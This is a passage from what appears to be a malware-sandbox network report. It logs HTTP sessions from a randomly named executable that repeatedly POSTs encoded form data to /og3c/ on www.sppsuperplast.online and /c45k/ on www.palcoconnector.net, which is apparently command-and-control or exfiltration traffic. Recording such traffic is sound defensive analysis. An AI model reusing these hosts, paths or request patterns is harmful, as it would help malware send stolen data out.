                                                      Sep 19, 2024 15:05:04.566158056 CEST252OUTData Raw: 77 74 34 73 31 73 53 4d 38 74 79 36 68 4a 32 68 64 58 71 74 4c 78 31 5a 48 6e 48 36 71 39 39 44 42 6e 35 77 48 48 34 2f 5a 66 32 7a 72 66 2b 43 78 46 64 32 42 6e 77 33 67 4a 73 67 72 68 2b 31 63 6e 5a 34 52 54 58 45 49 65 64 45 6a 57 38 2f 31 39
                                                      Data Ascii: wt4s1sSM8ty6hJ2hdXqtLx1ZHnH6q99DBn5wHH4/Zf2zrf+CxFd2Bnw3gJsgrh+1cnZ4RTXEIedEjW8/19IG81X6bXHfMhVsBfo7HEpia/JVOrwk6bd0+TmjMQhrb8ZHDmykfexzmH19vithLK/Exj8RS8BaxkwyzC32aoKVb60nQUPejekRQoWxVQM4rW6lz2sukGOHwp6qSwEaffGK6ZhyyIQ0wHtcRBbC/COkPL6xzf3Jk/R


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      15192.168.2.224917685.159.66.93802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:05:07.129654884 CEST763OUTPOST /og3c/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate, br
                                                      Host: www.sppsuperplast.online
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 201
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Origin: http://www.sppsuperplast.online
                                                      Referer: http://www.sppsuperplast.online/og3c/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 30 30 79 70 3d 43 4c 6b 74 34 42 6a 54 62 68 6a 71 65 64 69 6a 32 75 57 57 64 36 4d 50 57 41 65 66 5a 72 7a 57 64 70 41 30 5a 32 37 2f 2f 62 57 39 53 4b 50 69 58 45 7a 54 78 78 47 48 6c 72 48 73 6b 31 35 6e 4a 66 73 33 6a 75 78 69 6f 62 52 64 36 42 4f 43 50 35 76 4f 32 58 43 45 55 56 78 62 6b 71 63 52 79 4d 4e 53 55 53 6a 39 45 49 62 2f 67 38 77 4f 66 35 34 6f 2b 57 41 57 63 34 51 59 68 78 69 4c 58 39 41 64 45 5a 34 51 61 4c 61 54 6f 79 73 46 6e 4d 53 42 42 64 50 52 61 32 78 48 33 67 77 55 35 4e 32 66 5a 73 47 71 55 48 6f 75 51 39 59 63 35 55 41 2b 4a 39 47 41 4d 65 31 34 74 37 6d 35 51 51 3d 3d
                                                      Data Ascii: 00yp=CLkt4BjTbhjqedij2uWWd6MPWAefZrzWdpA0Z27//bW9SKPiXEzTxxGHlrHsk15nJfs3juxiobRd6BOCP5vO2XCEUVxbkqcRyMNSUSj9EIb/g8wOf54o+WAWc4QYhxiLX9AdEZ4QaLaToysFnMSBBdPRa2xH3gwU5N2fZsGqUHouQ9Yc5UA+J9GAMe14t7m5QQ==


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      16192.168.2.224917785.159.66.93802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:05:09.730232954 CEST2472OUTPOST /og3c/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate, br
                                                      Host: www.sppsuperplast.online
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 3625
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Origin: http://www.sppsuperplast.online
                                                      Referer: http://www.sppsuperplast.online/og3c/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 30 30 79 70 3d 43 4c 6b 74 34 42 6a 54 62 68 6a 71 66 39 53 6a 36 74 75 57 66 61 4d 51 5a 67 65 66 43 37 7a 53 64 70 4d 30 5a 33 76 76 2f 6f 36 39 58 4a 33 69 58 68 66 54 33 78 47 48 6a 72 47 6b 67 31 35 4c 4a 66 6f 37 6a 73 35 59 6f 59 39 64 37 67 65 43 4e 37 33 4a 75 58 43 47 51 56 78 63 6b 71 64 56 79 4d 64 57 55 53 33 44 45 49 54 2f 67 4f 49 4f 59 4a 34 76 67 47 41 57 63 34 51 71 68 78 6a 6f 58 39 49 46 45 59 51 36 61 2b 57 54 6f 54 67 46 6b 72 47 47 4a 39 50 76 45 47 77 78 7a 79 42 36 7a 2f 4b 58 63 4e 32 49 58 33 6c 54 62 61 6c 66 34 79 45 41 49 39 43 57 46 4c 49 66 6a 4a 2f 78 51 48 71 6c 31 6c 64 6b 4d 63 45 76 46 6c 61 50 71 68 52 59 50 47 45 79 7a 50 50 76 47 77 52 6d 62 2b 78 59 31 32 44 6c 39 39 44 41 79 5a 42 72 43 38 78 6f 57 39 68 53 61 4d 33 55 48 72 6f 52 33 32 55 66 46 41 6d 5a 6e 54 2f 73 4b 49 6c 58 32 72 6c 35 61 32 64 51 67 4e 49 45 44 5a 57 41 6a 31 6f 75 4c 43 68 31 48 42 6b 56 6c 2f 6a 49 79 46 50 78 49 75 4c 47 67 76 67 4e 63 44 58 6a 72 32 36 4f 45 68 51 70 66 54 4a 6a 79 [TRUNCATED]
                                                      Data Ascii: 00yp=CLkt4BjTbhjqf9Sj6tuWfaMQZgefC7zSdpM0Z3vv/o69XJ3iXhfT3xGHjrGkg15LJfo7js5YoY9d7geCN73JuXCGQVxckqdVyMdWUS3DEIT/gOIOYJ4vgGAWc4QqhxjoX9IFEYQ6a+WToTgFkrGGJ9PvEGwxzyB6z/KXcN2IX3lTbalf4yEAI9CWFLIfjJ/xQHql1ldkMcEvFlaPqhRYPGEyzPPvGwRmb+xY12Dl99DAyZBrC8xoW9hSaM3UHroR32UfFAmZnT/sKIlX2rl5a2dQgNIEDZWAj1ouLCh1HBkVl/jIyFPxIuLGgvgNcDXjr26OEhQpfTJjyjJI39TB3nDzFr2lCEvSVD7k0KAG+vmgwlVIGWMiKp6Bddt2+xQR1bRoR/9ml/BNavTMObQtgpggmGMwuh3YAjLoLU4jYkM05gPkObPAoxHPZ9T/WJII3s/cbUuBrTJeSNfexjjv7f1FU4+V0Mk6PyoBeAtl4l0I8Y9A7y9c7H0LAgYJ4UA/w13v5aetLqr07nQdgvesEOhEbivUrLpn0z+zSLcurs8QscIeFrsfZ0fty113nf/suFz4mjzRnrbezEPdRiJtVCs7IEGJBcfRPaMANzTnIcqxkBA9wSOi8n4euX7Y91HOmKaWvTumJfrNLEHzfzqW/8s2yvQ4rTOFRUknGzEhXAi/iu3Ixz///gRLH/6ddEFqWm0MgJfRGQDylbWctWPYgufZGkV7fLhROO0yoXtJ1thbWBpaZeZ4WzRxVDx2b8E4j7k2IKzu38igLaVy0RbqCr4PFwVnk+Zh3HFK07OynV2+2YwFHmhtXR885m+zUSF4F+Sedcds5ijTNxm8elH0VzxAzEpo2Tk6TGzxYJVAVc8l2y+/ZHTrrivNyQfUP9Ac3yjJqJZbRUgJinUsvW33to0suLZYbwWyVBMYxaeZln3fWTQssW/Sq5uRGVtxzx4MrlsYbJkvSCLna50cZ/0Wyf5+DrYePTayKJzs9+XZ4LgZvUe [TRUNCATED]
                                                      Sep 19, 2024 15:05:09.735575914 CEST1716OUTData Raw: 2b 2b 51 73 72 4d 53 4b 38 74 79 38 72 70 4b 49 64 58 71 62 4c 78 78 5a 48 6e 58 36 71 39 64 44 41 58 35 2f 59 6e 34 69 52 2f 33 37 69 2f 2f 47 78 46 64 69 42 6e 64 53 67 4f 38 67 72 7a 32 31 4b 6a 4e 34 52 6a 58 43 48 2b 63 59 30 47 77 70 31 39
                                                      Data Ascii: ++QsrMSK8ty8rpKIdXqbLxxZHnX6q9dDAX5/Yn4iR/37i//GxFdiBndSgO8grz21KjN4RjXCH+cY0Gwp19E08wqNbmnfNStsEtw7NEpjZ/JSOqN76asX+RfONlRrbMZHUEqnbex1hH1gvitJLK3IxmNUS4taxisyyy3xS4KXY609QUDnje9yQoGxVVE4qyal5Wsu+mOGxp6JcQIdfbKa//9l04EQ/UZUcyzd7xKnC5+R8faQwv8


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      17192.168.2.224917885.159.66.93802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:05:12.989339113 CEST481OUTGET /og3c/?00yp=PJMN73v+cS+JEOCp4N2ca7oXQDrHb//8AP5dNED26sKmApKDXWDq3GmViPe/3Gp4IvoVz7hFkPBhwTiSMYvo23y1UkhRtLoj8dNpbmj0FYqu8O4HVfsyiW8+Yu10&8Xv=VLHph HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.sppsuperplast.online
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Sep 19, 2024 15:05:13.658555984 CEST225INHTTP/1.1 404 Not Found
                                                      Server: nginx/1.14.1
                                                      Date: Thu, 19 Sep 2024 13:05:13 GMT
                                                      Content-Length: 0
                                                      Connection: close
                                                      X-Rate-Limit-Limit: 5s
                                                      X-Rate-Limit-Remaining: 19
                                                      X-Rate-Limit-Reset: 2024-09-19T13:05:18.5557108Z


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      18192.168.2.2249179208.91.197.27802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:05:18.812406063 CEST2472OUTPOST /c45k/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate, br
                                                      Host: www.palcoconnector.net
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 2161
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Origin: http://www.palcoconnector.net
                                                      Referer: http://www.palcoconnector.net/c45k/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 30 30 79 70 3d 35 2b 42 4e 66 51 39 43 32 46 54 44 37 74 50 75 34 2f 6a 6d 67 32 4f 69 44 6e 78 71 30 41 46 55 59 65 51 6c 2b 4b 33 67 6a 72 2f 42 58 56 53 68 76 70 63 76 67 51 4c 55 61 50 41 31 55 52 68 4f 6c 58 36 4f 67 4f 35 79 35 43 70 41 79 36 43 2b 53 53 36 7a 67 32 32 59 41 6f 70 37 52 57 39 43 46 76 46 51 44 64 6e 65 51 6e 66 53 4b 36 58 2f 37 67 6b 48 48 44 76 6f 52 36 2f 53 36 50 62 57 71 78 33 43 67 79 6f 47 62 47 61 45 44 38 70 35 46 49 52 58 4c 52 56 73 50 42 49 2f 36 7a 6c 4e 43 6e 52 75 56 4f 73 52 5a 69 61 41 41 4f 7a 4e 51 38 4e 6a 68 4d 78 4e 67 6f 75 67 50 44 77 76 2b 67 44 51 66 71 32 6d 6f 68 31 59 4c 72 6b 59 48 4b 56 62 53 54 49 41 2f 2b 70 34 4b 66 72 6f 42 65 38 37 6d 45 73 52 4d 69 6a 64 6c 4d 7a 67 73 4f 39 6c 2b 68 67 6d 6b 57 33 63 4a 6c 4f 59 59 4d 52 4a 63 6a 77 62 74 41 55 7a 78 77 38 4c 63 56 71 4d 44 31 7a 52 4a 46 65 74 47 46 55 45 6c 37 52 54 30 4e 32 61 34 58 4f 6f 51 6b 6d 71 73 66 48 2b 45 38 77 73 65 4c 43 51 66 7a 5a 71 45 54 31 41 7a 47 5a 6f 6a 5a 46 39 4a [TRUNCATED]
                                                      Data Ascii: 00yp=5+BNfQ9C2FTD7tPu4/jmg2OiDnxq0AFUYeQl+K3gjr/BXVShvpcvgQLUaPA1URhOlX6OgO5y5CpAy6C+SS6zg22YAop7RW9CFvFQDdneQnfSK6X/7gkHHDvoR6/S6PbWqx3CgyoGbGaED8p5FIRXLRVsPBI/6zlNCnRuVOsRZiaAAOzNQ8NjhMxNgougPDwv+gDQfq2moh1YLrkYHKVbSTIA/+p4KfroBe87mEsRMijdlMzgsO9l+hgmkW3cJlOYYMRJcjwbtAUzxw8LcVqMD1zRJFetGFUEl7RT0N2a4XOoQkmqsfH+E8wseLCQfzZqET1AzGZojZF9JZ74AhJ0+vYvbhqYoFND6VeB9/Znh1r4bEErHRGww8LoXl1kImYXEJ0We3BA/PWwsvLyd4jMhSkF+xxdHUxC4s2hwUw0QUNF2CmL/TfFJtqMyjETacX9zSK4VQkVbWf7bDJ4c+mqeqibUbePOCKmbBe2K8Hk20fTVlL9OgAFYbRoX+8LsblKsxhonkS+luxPjx0Dvm3ArgdZ0bRwP9fRIhIXd0GYrglmh9JTR2N6m1xVo4zv+aBDDn1ij8zakVHnQayvulams9S8s+G7KMotd0NiUPUafSnXxfu7r0/dkOLQ0qHz6ICoaB5/GT7OtN/sTddgWvn+ugolEP3TUip+bxG2E4DGN5KTpbBYIiXujakpI9xOZLOHoN5fKBjFboFwpwfmDAQs1+ew/9Ydo6lFMV8RcD7+PAl9q8y4h4zpyr3pNzFfo6RUGB8C6NTeGKui/7rctF46ZsZIblNboMx1uXxPX/vF3xUdajG4XRb6YpjzyfuqaTSEZIJkegJ6K4u1HD5R8odFP87n/QVUDrgkscf1x+ZTCBuagmTALMQS8h1bcHmvQ9GM1rsXGoTeMlrq4IjRf+oJm0OMzpdcDM80rX4m6afyiSbK7jWuD0tfHQILDIfdWaDHeOPeAZEnJM85qLD9LfC39rVm7P19JTs5jDz17vugr/mOaWW [TRUNCATED]
                                                      Sep 19, 2024 15:05:18.817806005 CEST246OUTData Raw: 48 51 69 30 66 5a 32 49 57 31 4e 63 4a 4a 76 79 67 59 44 73 4b 39 43 72 4f 50 2b 6f 39 7a 77 48 2f 7a 67 67 77 6e 6b 4c 62 62 79 6c 53 59 56 58 36 43 46 42 51 71 63 31 2f 63 57 46 74 43 45 4d 79 4b 6d 49 46 50 35 30 46 65 4e 31 4c 38 4d 52 68 43
                                                      Data Ascii: HQi0fZ2IW1NcJJvygYDsK9CrOP+o9zwH/zggwnkLbbylSYVX6CFBQqc1/cWFtCEMyKmIFP50FeN1L8MRhC2prGq7Yz3z7IQmuUOgmk+CCCQ3H8gtPe+cBcPdh8mG7s/uxE0IY7O8cFXr9DIpGrZIAp7B5lzl+7Ikv7+MKaNBGWiuICyLCL8pxkmDnfdIBxYyvOstRjUIoIQXrBrNmfnQTh2owzf0HTjcd/i1v2sjVdyt4tEUNZU


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      19192.168.2.2249180208.91.197.27802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:05:21.354839087 CEST757OUTPOST /c45k/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate, br
                                                      Host: www.palcoconnector.net
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 201
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Origin: http://www.palcoconnector.net
                                                      Referer: http://www.palcoconnector.net/c45k/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 30 30 79 70 3d 35 2b 42 4e 66 51 39 43 32 46 54 44 37 75 58 75 37 4f 6a 6d 69 57 4f 69 41 6e 78 71 37 67 46 4e 59 65 63 44 2b 49 62 77 6a 36 37 42 58 45 69 68 76 66 6f 76 68 51 4c 56 52 76 42 2b 51 52 68 68 6c 58 36 34 67 4b 39 79 35 43 39 41 77 66 47 2b 61 7a 36 30 2f 57 32 61 4a 49 70 2b 52 57 78 78 46 76 49 4c 44 63 50 65 51 6d 54 53 4c 37 6e 2f 39 47 49 48 4d 6a 75 6a 54 36 2f 42 36 50 65 57 71 78 6d 42 67 79 55 47 62 33 47 45 61 4f 68 35 50 37 4a 58 42 78 56 74 47 68 4a 31 35 44 67 63 4f 58 6c 6e 52 76 49 30 53 6d 75 67 44 4f 6e 54 61 39 49 73 33 74 78 54 2f 74 58 44 4e 43 68 68 6c 67 3d 3d
                                                      Data Ascii: 00yp=5+BNfQ9C2FTD7uXu7OjmiWOiAnxq7gFNYecD+Ibwj67BXEihvfovhQLVRvB+QRhhlX64gK9y5C9AwfG+az60/W2aJIp+RWxxFvILDcPeQmTSL7n/9GIHMjujT6/B6PeWqxmBgyUGb3GEaOh5P7JXBxVtGhJ15DgcOXlnRvI0SmugDOnTa9Is3txT/tXDNChhlg==


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      20192.168.2.2249181208.91.197.27802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:05:23.908811092 CEST2472OUTPOST /c45k/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate, br
                                                      Host: www.palcoconnector.net
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 3625
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Origin: http://www.palcoconnector.net
                                                      Referer: http://www.palcoconnector.net/c45k/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 30 30 79 70 3d 35 2b 42 4e 66 51 39 43 32 46 54 44 36 4f 6e 75 35 74 4c 6d 32 47 4f 6c 65 33 78 71 30 41 46 42 59 65 51 44 2b 4b 33 67 6a 70 4c 42 58 57 61 68 76 35 63 76 6a 51 4c 56 5a 50 41 31 55 52 68 4a 6c 58 75 46 67 4c 68 69 35 42 52 41 79 35 61 2b 53 52 69 7a 33 47 32 59 43 6f 70 35 52 57 78 65 46 76 59 48 44 63 62 30 51 6d 4c 53 4c 4a 2f 2f 37 32 49 45 49 54 75 6a 54 36 2f 56 36 50 65 71 71 78 2f 53 67 7a 4d 57 62 45 65 45 66 63 70 35 44 34 52 51 44 78 56 70 4c 42 49 68 36 79 5a 77 43 6e 52 71 56 4f 34 76 5a 69 65 41 47 64 4c 4e 51 37 52 69 39 73 78 4f 39 59 75 67 41 6a 77 70 2b 67 44 55 66 71 32 6d 6f 67 35 59 4a 37 6b 59 48 50 70 59 63 7a 49 41 68 75 70 35 45 2f 58 6b 42 64 41 46 6d 48 30 72 5a 42 50 64 6b 4f 62 67 6d 65 39 6c 34 52 67 6f 6b 57 33 62 62 6c 4f 79 59 4d 4a 72 63 6e 52 41 74 41 55 7a 78 79 6b 4c 4e 58 79 4d 45 6c 7a 52 57 31 65 6f 49 6c 55 44 6c 37 55 30 30 4d 43 61 34 57 57 6f 51 57 2b 71 71 63 2f 39 51 63 77 68 4a 62 43 53 49 6a 59 67 45 51 42 62 7a 47 52 53 6a 61 4e 39 4a [TRUNCATED]
                                                      Data Ascii: 00yp=5+BNfQ9C2FTD6Onu5tLm2GOle3xq0AFBYeQD+K3gjpLBXWahv5cvjQLVZPA1URhJlXuFgLhi5BRAy5a+SRiz3G2YCop5RWxeFvYHDcb0QmLSLJ//72IEITujT6/V6Peqqx/SgzMWbEeEfcp5D4RQDxVpLBIh6yZwCnRqVO4vZieAGdLNQ7Ri9sxO9YugAjwp+gDUfq2mog5YJ7kYHPpYczIAhup5E/XkBdAFmH0rZBPdkObgme9l4RgokW3bblOyYMJrcnRAtAUzxykLNXyMElzRW1eoIlUDl7U00MCa4WWoQW+qqc/9QcwhJbCSIjYgEQBbzGRSjaN9JbD4CAJ0+/YuVBqi50wM6VW/9/VRhzT4bVErAT+3tcLuUV1uMmZmEJg4eyNA++OwtsTyKbLPnikCphwFcExo4sypwWIkTmlF2ymL81DCBdrG3jFIV8XrzSKsVStibi37bDZ4doyqeqiUTbeSHiWQbBSyK9r02yzTVV79Ol0FVbRoPu8Mm7kisxFSnmTJke1PgXYDtlPA/wc/nbRtL9e9IhYXdx+IrkZmhcJTDHN6yFxR0Iz0+aAtDnx+j4XgkXznQbyv5Uam0tShgeG3d8oOd0EpUMB/fTfXjPO7ngLdnuLO2qHzhYCKaBhvGSX0tM3sSvlgUPn/6woqCP3QQiohbw22E4PGN92TpqBYPRvu86krM9wJQrS3oNpbKF7VbqBwrkzmTlkr3Oe28NYX/qkiMV8VcHXuPTh9tp+4t5z2tb2vUjEXs6RgGBtl6MnOG9ei/6bctXQ6ZcZIblNaoMxxuX8oX6L/3xUdayG4WjD6A5jrtPutNDSWZIdWeklUK4C1BSZR8odGBs7gxwVLDr9Gscemx+FTByiam0rALvoS7B1bbHmsfdGN1rtaGpuDMmzq48XRa70GvkOPjZdKZ8h0rQw+6YTyjhPK9iWuDktfZgIME4fMSaHLeOj0AYU3JeI5pYL9NY+07bV71v1zJTwajDL97vWar9WOfGW [TRUNCATED]
                                                      Sep 19, 2024 15:05:23.915198088 CEST1710OUTData Raw: 48 57 69 30 66 54 79 49 4c 48 4e 63 4a 6a 76 78 38 59 44 73 61 39 43 72 75 50 39 59 39 30 34 58 2f 79 70 41 77 67 74 72 62 50 79 6c 54 76 56 58 6d 6f 46 44 63 71 64 67 7a 63 66 51 5a 43 45 38 79 49 2f 59 45 54 76 30 49 42 4e 79 44 77 4d 52 52 38
                                                      Data Ascii: HWi0fTyILHNcJjvx8YDsa9CruP9Y904X/ypAwgtrbPylTvVXmoFDcqdgzcfQZCE8yI/YETv0IBNyDwMRR82bjG49czhRjIXGuXDAml+Ce5Q22Vgse5+oxcNth8iAvvpuxKxIY2O8dLXr1HIrC7ZMEp7DRlyV+8B0u+ucKANBC/itodyKyL8sJkgj3fYIBxFivHkNQzLdwXQU668dePl2/F65MkaFussf5yuFeejhdk5tEjGBR+Y


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      21192.168.2.2249182208.91.197.27802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:05:26.496952057 CEST479OUTGET /c45k/?00yp=08ptcl9k6k3Clc+jjeiigEOOLHF28gEUYr4PirX9ycnlRkqnpIEJw02nTPpiHhV7v0qw4/F1nlB53J+WXC6t4B6EHZ9Land6YOYaCIbjR0qGfJ/yxxEwKy76YPu4&8Xv=VLHph HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.palcoconnector.net
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Sep 19, 2024 15:05:27.527949095 CEST1236INHTTP/1.1 200 OK
                                                      Date: Thu, 19 Sep 2024 13:05:26 GMT
                                                      Server: Apache
                                                      Referrer-Policy: no-referrer-when-downgrade
                                                      Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                      Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                      Set-Cookie: vsid=911vr4742967270645082; expires=Tue, 18-Sep-2029 13:05:27 GMT; Max-Age=157680000; path=/; domain=www.palcoconnector.net; HttpOnly
                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_WNEGIo2X8GrBwCaPACa7fZe76KGK/cwp9Oa5hrIPOkxDdIGAQl0hpriNFGNPiCg5BWBJWBOiVGzeipDDAJ3DZw==
                                                      Connection: close
                                                      Transfer-Encoding: chunked
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 62 37 63 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22
                                                      Data Ascii: b7cc<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"
                                                      Sep 19, 2024 15:05:27.527972937 CEST1236INData Raw: 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69
                                                      Data Ascii: > <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in
                                                      Sep 19, 2024 15:05:27.527982950 CEST1236INData Raw: 6f 6e 28 6a 29 7b 69 66 28 74 79 70 65 6f 66 28 6a 29 21 3d 22 62 6f 6f 6c 65 61 6e 22 29 7b 6a 3d 74 72 75 65 7d 69 66 28 6a 26 26 74 79 70 65 6f 66 28 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 75 73 65 64 6c 61 6e 67 29 3d 3d 22 73 74 72 69 6e 67 22
                                                      Data Ascii: on(j){if(typeof(j)!="boolean"){j=true}if(j&&typeof(cmp_getlang.usedlang)=="string"&&cmp_getlang.usedlang!==""){return cmp_getlang.usedlang}var g=window.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="languages
                                                      Sep 19, 2024 15:05:27.528026104 CEST1236INData Raw: 61 67 65 73 22 20 69 6e 20 68 29 7b 66 6f 72 28 76 61 72 20 71 3d 30 3b 71 3c 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73 2e 6c 65 6e 67 74 68 3b 71 2b 2b 29 7b 69 66 28 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67
                                                      Data Ascii: ages" in h){for(var q=0;q<h.cmp_customlanguages.length;q++){if(h.cmp_customlanguages[q].l.toUpperCase()==o.toUpperCase()){o="en";break}}}b="_"+o}function x(i,e){var w="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash.s
